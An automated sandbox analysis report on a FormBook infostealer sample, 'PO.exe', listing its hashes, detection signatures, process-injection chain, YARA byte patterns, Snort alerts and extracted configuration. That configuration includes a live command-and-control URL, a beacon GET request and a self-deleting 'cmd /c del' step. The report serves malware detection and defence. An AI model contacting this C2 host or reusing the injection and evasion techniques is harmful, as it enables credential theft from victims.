Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:PO.exe
Analysis ID:383909
MD5:ba83b33d39ca6c3bf1f311d1b6a38d1a
SHA1:ce0bcbb882b1a2105138b9955c1d892e4c6f0947
SHA256:ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO.exe (PID: 5720 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
    • PO.exe (PID: 2904 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 4500 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.2.PO.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.PO.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.exeVirustotal: Detection: 15%Perma Link
          Source: PO.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.chkdsk.exe.2a5660.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.2.chkdsk.exe.54ef834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.PO.exe.2670000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
          Source: Binary string: chkdsk.pdbGCTL source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.riceandginger.com/fcn/
          Source: global trafficHTTP traffic detected: GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ayescarrental.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419DB3 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F3B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A80 NtOpenDirectoryObject,
